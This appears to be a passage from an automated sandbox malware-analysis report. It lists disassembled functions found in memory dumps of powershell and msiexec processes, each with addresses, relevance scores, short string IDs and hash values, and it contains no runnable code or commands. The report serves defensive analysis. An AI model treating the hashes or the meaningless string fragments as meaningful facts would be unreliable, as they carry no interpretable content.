                                                                                                                                      • Snapshot File: hcaresult_2_2_7260000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 4'q$4'q$d%q$d%q$d%q$d%q$tPq$tPq$$q
                                                                                                                                      • API String ID: 0-328666906
                                                                                                                                      • Opcode ID: bc4b45b781ea873517ce2a5eb4becd151e39d44f67c237d9968e025fe1dc5891
                                                                                                                                      • Instruction ID: 01c06d09a3c585075ba6b209b362fe1ab29c419bb405471d931877996eabd636
                                                                                                                                      • Opcode Fuzzy Hash: bc4b45b781ea873517ce2a5eb4becd151e39d44f67c237d9968e025fe1dc5891
                                                                                                                                      • Instruction Fuzzy Hash: 9A71D8B8F202569FDB28DF54D41977ABBA2BF84310F1A845BE9019B391DB31DC81C791
                                                                                                                                      Function 07267BA0 Relevance: 10.3, Strings: 8, Instructions: 321COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2044796178.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7260000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 4'q$4'q$tPq$tPq$$q$$q$$q$$q
                                                                                                                                      • API String ID: 0-2958727440
                                                                                                                                      • Opcode ID: aefd28bfd7b85428edf9462592c4f70806ca2c2ddab5bd354e2ca00daff16b8f
                                                                                                                                      • Instruction ID: 359aa66a58e8696629d00ce531603185aac103829939353b92e427e7ab89f988
                                                                                                                                      • Opcode Fuzzy Hash: aefd28bfd7b85428edf9462592c4f70806ca2c2ddab5bd354e2ca00daff16b8f
                                                                                                                                      • Instruction Fuzzy Hash: 84A15BB17243468FD7258B79A81877ABBA2EFC5325F14846BD945CB391CB31CC82C761
                                                                                                                                      Function 0726F464 Relevance: 9.0, Strings: 7, Instructions: 204COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2044796178.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7260000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 4'q$tPq$tPq$$q$(q$(q$(q
                                                                                                                                      • API String ID: 0-3442133670
                                                                                                                                      • Opcode ID: 0d6084467b2542e001b1ca388365a5800a62fe86fa03eba169bf09b54886f1d8
                                                                                                                                      • Instruction ID: b8e63488362f258e18385bcdbe74af64c6fe0376e9d44ae34c57b1b16868c492
                                                                                                                                      • Opcode Fuzzy Hash: 0d6084467b2542e001b1ca388365a5800a62fe86fa03eba169bf09b54886f1d8
                                                                                                                                      • Instruction Fuzzy Hash: 8171F7B0A20207DFCF258F04E649B6AB7B2AF85711F19815BE815AB291C771DDC1CBA1
                                                                                                                                      Function 0726EBEF Relevance: 7.7, Strings: 6, Instructions: 159COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2044796178.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7260000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 4'q$d%q$d%q$d%q$tPq$$q
                                                                                                                                      • API String ID: 0-2531934922
                                                                                                                                      • Opcode ID: fb06861db39f74f9403cf2ee280ef8eadc2e81e7f314dd5daf48a6acb13e8a9d
                                                                                                                                      • Instruction ID: 22bb3bf930dd5f4f30b8eb24686f737d99bcf5402801a0d1d1a2145e3f68d68f
                                                                                                                                      • Opcode Fuzzy Hash: fb06861db39f74f9403cf2ee280ef8eadc2e81e7f314dd5daf48a6acb13e8a9d
                                                                                                                                      • Instruction Fuzzy Hash: FA51A2FCE30246DFDB28DF14D549AA9BBA6BF45210F1A8097E9019B291D731DCC0CBA1
                                                                                                                                      Function 0726AA10 Relevance: 7.6, Strings: 6, Instructions: 105COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2044796178.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7260000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: $q$$q$$q$$q$$q$$q
                                                                                                                                      • API String ID: 0-2069967915
                                                                                                                                      • Opcode ID: ca2200c65551f9f74958be2033f4c9b92ab4b1ac50a73a900c2fc83196f62b7b
                                                                                                                                      • Instruction ID: 6ba7ef3582c1861a6e4ddc795dbb6cf19ef130dca68fb5f0f3327585bc706f5c
                                                                                                                                      • Opcode Fuzzy Hash: ca2200c65551f9f74958be2033f4c9b92ab4b1ac50a73a900c2fc83196f62b7b
                                                                                                                                      • Instruction Fuzzy Hash: DA3139B6B343038BDB354665A959176F7B2EFD1211B28C47BC442AB242DE31CC86C391
                                                                                                                                      Function 0726FB1C Relevance: 6.4, Strings: 5, Instructions: 198COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2044796178.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7260000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 4'q$tPq$$q$$q$$q
                                                                                                                                      • API String ID: 0-838716513
                                                                                                                                      • Opcode ID: c41f05034b7bafea2ef93e21bc7f84f4a704db3cc40399a3de17c32d0dbd19cf
                                                                                                                                      • Instruction ID: fc87182ac292e37983df206088a0d407645be94b16f879af91c3b143e990461c
                                                                                                                                      • Opcode Fuzzy Hash: c41f05034b7bafea2ef93e21bc7f84f4a704db3cc40399a3de17c32d0dbd19cf
                                                                                                                                      • Instruction Fuzzy Hash: AA61B0B0A3020BDFDF24CE14E6497AA7BA2AF46311F188457ED115B291CB71ECD1CBA1
                                                                                                                                      Function 07260538 Relevance: 6.4, Strings: 5, Instructions: 148COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2044796178.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7260000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 4'q$4'q$$q$$q$$q
                                                                                                                                      • API String ID: 0-170447905
                                                                                                                                      • Opcode ID: 1a95f80cdff837964bbfd3d69eb927b3f03e057d1e9a322f5dc35a16c4502239
                                                                                                                                      • Instruction ID: 3f6f670de81e48cf86f06d87851d69aefb9c3e63ec6c99502abd05feb55a7b18
                                                                                                                                      • Opcode Fuzzy Hash: 1a95f80cdff837964bbfd3d69eb927b3f03e057d1e9a322f5dc35a16c4502239
                                                                                                                                      • Instruction Fuzzy Hash: E14138B1B20307DFDB395B249414BAA7FA2AFC1211F14846FD805CB291DB32D982D7A2
                                                                                                                                      Function 0726EF60 Relevance: 6.4, Strings: 5, Instructions: 122COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2044796178.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7260000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 4'q$4'q$$q$$q$$q
                                                                                                                                      • API String ID: 0-170447905
                                                                                                                                      • Opcode ID: 75f2d500d1a4b10b480a8d1190531ab4238d0fe7daa3acf187ada6021d105d60
                                                                                                                                      • Instruction ID: c3af60bd7c3ad3036a747d3da52485be22b9aa76da65348e345f27f1692b5555
                                                                                                                                      • Opcode Fuzzy Hash: 75f2d500d1a4b10b480a8d1190531ab4238d0fe7daa3acf187ada6021d105d60
                                                                                                                                      • Instruction Fuzzy Hash: 664106B5B2020BDFDF24AA6AA54867BB7E5EF88211F24807BD805C7249DB32C481C761
                                                                                                                                      Function 0726ED26 Relevance: 6.3, Strings: 5, Instructions: 85COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2044796178.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7260000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 4'q$d%q$d%q$d%q$tPq
                                                                                                                                      • API String ID: 0-706544200
                                                                                                                                      • Opcode ID: 469ba74e3e18d99244dfc77a15349c06b10a781308c88f2d91b8c454ce3cc700
                                                                                                                                      • Instruction ID: 10da34bc80768af109f5237f1ae4473571aa9127cd3d7ecdf184570ed004fea1
                                                                                                                                      • Opcode Fuzzy Hash: 469ba74e3e18d99244dfc77a15349c06b10a781308c88f2d91b8c454ce3cc700
                                                                                                                                      • Instruction Fuzzy Hash: B031A7B8F202169FD728DF54C449A6DBBA6FF48720F2A8156E905AB351C731DC81CB91
                                                                                                                                      Function 0726E4F0 Relevance: 5.4, Strings: 4, Instructions: 401COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2044796178.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7260000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: (oq$(oq$(oq$(oq
                                                                                                                                      • API String ID: 0-3853041632
                                                                                                                                      • Opcode ID: 922f0bd44378bde7509c26eb46c22d494ec9a0d9d7dfc7a0f0575ba543f1b905
                                                                                                                                      • Instruction ID: 7f77fd5a0c7351f78b7a58b9d8b4c66dfdda9e5cd60a51b81c872c6564983afb
                                                                                                                                      • Opcode Fuzzy Hash: 922f0bd44378bde7509c26eb46c22d494ec9a0d9d7dfc7a0f0575ba543f1b905
                                                                                                                                      • Instruction Fuzzy Hash: 67D168B4F24346DFDB158F24C8597AA7BA2FF85300F15846BE8158B2D1DB31D885CB61
                                                                                                                                      Function 072697B0 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2044796178.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7260000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: $q$$q$$q$$q
                                                                                                                                      • API String ID: 0-4102054182
                                                                                                                                      • Opcode ID: 54a5200a531c35f8166a8cb2caf5ed5d2be3a941ea00b4428d5d65b00ed25969
                                                                                                                                      • Instruction ID: 7e3d35d2d16c23cdc147a3ed7f3b78cb17dba5a41f10561d28d27347569c2062
                                                                                                                                      • Opcode Fuzzy Hash: 54a5200a531c35f8166a8cb2caf5ed5d2be3a941ea00b4428d5d65b00ed25969
                                                                                                                                      • Instruction Fuzzy Hash: 56216BF17303075BEB34566A98497267ADA9FC1B15F28843FA585CF381CD71E8C28361
                                                                                                                                      Function 0726030A Relevance: 5.0, Strings: 4, Instructions: 44COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2044796178.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7260000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 4'q$4'q$$q$$q
                                                                                                                                      • API String ID: 0-3199993180
                                                                                                                                      • Opcode ID: 31ea031b591527bee1cb5de8e379270992c49dedab2022ff5d376c1b77376eca
                                                                                                                                      • Instruction ID: 6883f55cafda2072279d47457223f59c3b6bdd2e059a5ce36caab8e394b4a4d8
                                                                                                                                      • Opcode Fuzzy Hash: 31ea031b591527bee1cb5de8e379270992c49dedab2022ff5d376c1b77376eca
                                                                                                                                      • Instruction Fuzzy Hash: 7901F9617293838FC73B026428352696FB25FC2512B2E45D7D481CF2A2CD648D66C75B

                                                                                                                                      Executed Functions

                                                                                                                                      Function 02E3C146 Relevance: 2.7, Strings: 2, Instructions: 229COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2526661002.0000000002E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E30000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_2e30000_msiexec.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: PHq$PHq
                                                                                                                                      • API String ID: 0-1274609152
                                                                                                                                      • Opcode ID: ab6ae413ea93c276a45fa5b7202241141749f784105a675db2241fd3a6cf5fad
                                                                                                                                      • Instruction ID: 04592dbe4a33cdc5553b1c98d89a1a10aeada761ca6c3dda7ab0a8759ca00359
                                                                                                                                      • Opcode Fuzzy Hash: ab6ae413ea93c276a45fa5b7202241141749f784105a675db2241fd3a6cf5fad
                                                                                                                                      • Instruction Fuzzy Hash: AAA1DA75E402188FDB15CFAAC844A9DBBF2BF89315F24D0AAE409AB351DB309841CF50
                                                                                                                                      Function 02E35362 Relevance: 2.7, Strings: 2, Instructions: 195COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2526661002.0000000002E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E30000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_2e30000_msiexec.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: PHq$PHq
                                                                                                                                      • API String ID: 0-1274609152
                                                                                                                                      • Opcode ID: cf7754ce6aaad1e5d33c73070aa0f320abb64fc6fe68c7df7eac7bb401d2f593
                                                                                                                                      • Instruction ID: 55af5cc6f91b9a408112ff4d966cb645c6bdec78d5e2dc74e2b0182bc0233e06
                                                                                                                                      • Opcode Fuzzy Hash: cf7754ce6aaad1e5d33c73070aa0f320abb64fc6fe68c7df7eac7bb401d2f593
                                                                                                                                      • Instruction Fuzzy Hash: 1A91E574E00218DFDB15CFAAC884A9DBBF2BF89301F54D0A9E809AB365DB349845CF50
                                                                                                                                      Function 02E3D2CB Relevance: 2.7, Strings: 2, Instructions: 188COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2526661002.0000000002E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E30000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_2e30000_msiexec.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: PHq$PHq
                                                                                                                                      • API String ID: 0-1274609152
                                                                                                                                      • Opcode ID: 298f4f31cf6a9aecec68dbf1d9b6186d38352ed54741197bd2ac851dfa61f154
                                                                                                                                      • Instruction ID: e6e04c4d7c556ce810617a29755e2ef4ae2f8a4c02fc9e3f4d1f54941df1f7af
                                                                                                                                      • Opcode Fuzzy Hash: 298f4f31cf6a9aecec68dbf1d9b6186d38352ed54741197bd2ac851dfa61f154
                                                                                                                                      • Instruction Fuzzy Hash: BC81E474E40218DFDB18CFAAD884A9DBBF2BF89311F14D069E409AB361DB309981CF10
                                                                                                                                      Function 02E3CA58 Relevance: 2.7, Strings: 2, Instructions: 188COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2526661002.0000000002E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E30000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_2e30000_msiexec.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: PHq$PHq
                                                                                                                                      • API String ID: 0-1274609152
                                                                                                                                      • Opcode ID: df5043047b323c75579e8a8744c430d621756d72f8ecc5fbd5641a8cbd7fc8f2
                                                                                                                                      • Instruction ID: c83611a2c9a1e681c94913d82c0451ed6bee2ed6a95f4e1c8db537af5a425b54
                                                                                                                                      • Opcode Fuzzy Hash: df5043047b323c75579e8a8744c430d621756d72f8ecc5fbd5641a8cbd7fc8f2
                                                                                                                                      • Instruction Fuzzy Hash: BE81B474E40218CFDB15DFAAC944A9DBBF2BF88305F24D06AE819AB361DB349941CF50
                                                                                                                                      Function 02E3CD28 Relevance: 2.7, Strings: 2, Instructions: 187COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2526661002.0000000002E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E30000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_2e30000_msiexec.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: PHq$PHq
                                                                                                                                      • API String ID: 0-1274609152
                                                                                                                                      • Opcode ID: 59490d97e3203340cc530c58cda1cc2167242076a4408f1252a6638254c51910
                                                                                                                                      • Instruction ID: 368dbf25a88b2dfa36a977a9d33e00735ad75eeeff9223ff5daa91e58fceaca3
                                                                                                                                      • Opcode Fuzzy Hash: 59490d97e3203340cc530c58cda1cc2167242076a4408f1252a6638254c51910
                                                                                                                                      • Instruction Fuzzy Hash: 6881A574E40218CFDB15CFAAD844A9DBBF2BF89305F24D06AE419AB365DB349941CF50
                                                                                                                                      Function 02E3D599 Relevance: 2.7, Strings: 2, Instructions: 186COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2526661002.0000000002E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E30000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_2e30000_msiexec.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: PHq$PHq
                                                                                                                                      • API String ID: 0-1274609152
                                                                                                                                      • Opcode ID: 7c35c16d62082345dd98f82405b0b68bf17977519900828f67e54f9e876cf1a3
                                                                                                                                      • Instruction ID: 6bf57c19d7b3f001ad6803deec28bece086b1e5ffaa3eec6c18b9c6441e18969
                                                                                                                                      • Opcode Fuzzy Hash: 7c35c16d62082345dd98f82405b0b68bf17977519900828f67e54f9e876cf1a3
                                                                                                                                      • Instruction Fuzzy Hash: BB81C374E40218CFEB15DFAAD984A9DBBF2BF88305F14D069E819AB365DB305941CF50
                                                                                                                                      Function 02E3C788 Relevance: 2.7, Strings: 2, Instructions: 185COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2526661002.0000000002E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E30000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_2e30000_msiexec.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: PHq$PHq
                                                                                                                                      • API String ID: 0-1274609152
                                                                                                                                      • Opcode ID: fbdec6ffe43800993cfaaaf29a388f0156caf4f81f24271715e8f4fae297f353
                                                                                                                                      • Instruction ID: 42dadb059d55f71fc6a4f94b198da94b13560387595e09940ccfe26ec0dff2da
                                                                                                                                      • Opcode Fuzzy Hash: fbdec6ffe43800993cfaaaf29a388f0156caf4f81f24271715e8f4fae297f353
                                                                                                                                      • Instruction Fuzzy Hash: DB81A274E402188FDB15CFAAD944A9DBBF2BF88305F24D06AE419AB361DB349981CF50
                                                                                                                                      Function 02E3CFF7 Relevance: 2.7, Strings: 2, Instructions: 185COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2526661002.0000000002E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E30000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_2e30000_msiexec.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: PHq$PHq
                                                                                                                                      • API String ID: 0-1274609152
                                                                                                                                      • Opcode ID: 701e32f1ca07e718b9269c658525f179bd1531ebcf13f7838670cbaffb2fd690
                                                                                                                                      • Instruction ID: e7c5c7aa9496fff52af4df7fa6766627672068c0bde0695789a75b5e03ddc664
                                                                                                                                      • Opcode Fuzzy Hash: 701e32f1ca07e718b9269c658525f179bd1531ebcf13f7838670cbaffb2fd690
                                                                                                                                      • Instruction Fuzzy Hash: 5B81B574E40218CFEB15CFAAD984A9DBBF2BF88305F14D069E819AB365DB345981CF50
                                                                                                                                      Function 2574D0D0 Relevance: .7, Instructions: 745COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2545923853.0000000025740000.00000040.00000800.00020000.00000000.sdmp, Offset: 25740000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_25740000_msiexec.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 1ecf0af5a1843f7b47c65fa501623eb9794abc2228157785fcb63faba7ed1a24
                                                                                                                                      • Instruction ID: 4f54a7c415ea71b0a13dc66bec7ffc6bcb6f63bf3f73b24d557d733b0e6b1282
                                                                                                                                      • Opcode Fuzzy Hash: 1ecf0af5a1843f7b47c65fa501623eb9794abc2228157785fcb63faba7ed1a24
                                                                                                                                      • Instruction Fuzzy Hash: 4C827D74E012288FDBA5DF69C998BDDBBB2BB89300F1481E9980DA7351DB355E81CF41
                                                                                                                                      Function 25746A80 Relevance: .2, Instructions: 200COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2545923853.0000000025740000.00000040.00000800.00020000.00000000.sdmp, Offset: 25740000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_25740000_msiexec.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 355c61b0a6f62a4ae3cf13be09dbce6fa8a2a0acfb20017f8e490904b689d08d
                                                                                                                                      • Instruction ID: 237339d9f912ab22181ef425a0ae1c3ef3d3694d1f84093a1b1ed14527b5d67c
                                                                                                                                      • Opcode Fuzzy Hash: 355c61b0a6f62a4ae3cf13be09dbce6fa8a2a0acfb20017f8e490904b689d08d
                                                                                                                                      • Instruction Fuzzy Hash: 8A818E74E00218DBDB14DFAAC894B9DBBB2FF89301F208169D405AB395DB35A946DF50
                                                                                                                                      Function 02E3EC0B Relevance: .1, Instructions: 148COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2526661002.0000000002E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E30000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_2e30000_msiexec.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 6835a07ed3e4947691a016554cc9e92b59c3e36a0f09b5b3c92d790bdc3fcb7c
                                                                                                                                      • Instruction ID: 1ea7b9ba1e728284e0011bd6076213742177d58e4d39d5d36452cb88f4c91d5a
                                                                                                                                      • Opcode Fuzzy Hash: 6835a07ed3e4947691a016554cc9e92b59c3e36a0f09b5b3c92d790bdc3fcb7c
                                                                                                                                      • Instruction Fuzzy Hash: 44519574E40208DFDB19DFAAD594A9DBBB2FF89301F24D06AE815AB364DB305842CF50
                                                                                                                                      Function 02E3EC18 Relevance: .1, Instructions: 147COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2526661002.0000000002E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E30000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_2e30000_msiexec.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 1e5120d5f461c9078978739ec78365f77d9f8327d23cfeef89f8dfc85b3bfad9
                                                                                                                                      • Instruction ID: 94fdcce3e67269dc0e8ceb29c65814ea59ff095d6d1764d01b5f0895ce73b231
                                                                                                                                      • Opcode Fuzzy Hash: 1e5120d5f461c9078978739ec78365f77d9f8327d23cfeef89f8dfc85b3bfad9
                                                                                                                                      • Instruction Fuzzy Hash: 09518574E40308DFDB19DFAAD594A9DBBB2BF89301F24D169E819AB364DB305842CF14
                                                                                                                                      Function 02E35F38 Relevance: 2.8, Strings: 2, Instructions: 327COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2526661002.0000000002E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E30000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_2e30000_msiexec.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: Hq$Hq
                                                                                                                                      • API String ID: 0-925789375
                                                                                                                                      • Opcode ID: 562e35f9e22c22a06bcb5eb1296bb1f718861d9652a323242475c7f1350cf377
                                                                                                                                      • Instruction ID: 873eb2744455169fde79267f81744c56153f00a83ad440bfcee8b69de1eca792
                                                                                                                                      • Opcode Fuzzy Hash: 562e35f9e22c22a06bcb5eb1296bb1f718861d9652a323242475c7f1350cf377
                                                                                                                                      • Instruction Fuzzy Hash: 84B1C1307442009FDB269F35C858B7EBBE6AFC8305F159569E80ACB391CB38C842CB95
                                                                                                                                      Function 2574E310 Relevance: 2.7, Strings: 2, Instructions: 239COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2545923853.0000000025740000.00000040.00000800.00020000.00000000.sdmp, Offset: 25740000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_25740000_msiexec.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: LRq$LRq
                                                                                                                                      • API String ID: 0-3710822783
                                                                                                                                      • Opcode ID: ddaab43912646de940bfe017561f4db70537e46237e0be4bbe0b3bbd86ce51da
                                                                                                                                      • Instruction ID: c932548600e8acd6929209f8c1b76d261ca795771ff627c0e07d1813c4c891c5
                                                                                                                                      • Opcode Fuzzy Hash: ddaab43912646de940bfe017561f4db70537e46237e0be4bbe0b3bbd86ce51da
                                                                                                                                      • Instruction Fuzzy Hash: 01816E34B401158FC704DF79C994E6E7BB2BF8971072541A9E916DB3A1DB34ED02CB92
                                                                                                                                      Function 02E36498 Relevance: 2.7, Strings: 2, Instructions: 232COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2526661002.0000000002E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E30000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_2e30000_msiexec.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: ,q$,q
                                                                                                                                      • API String ID: 0-1667412543
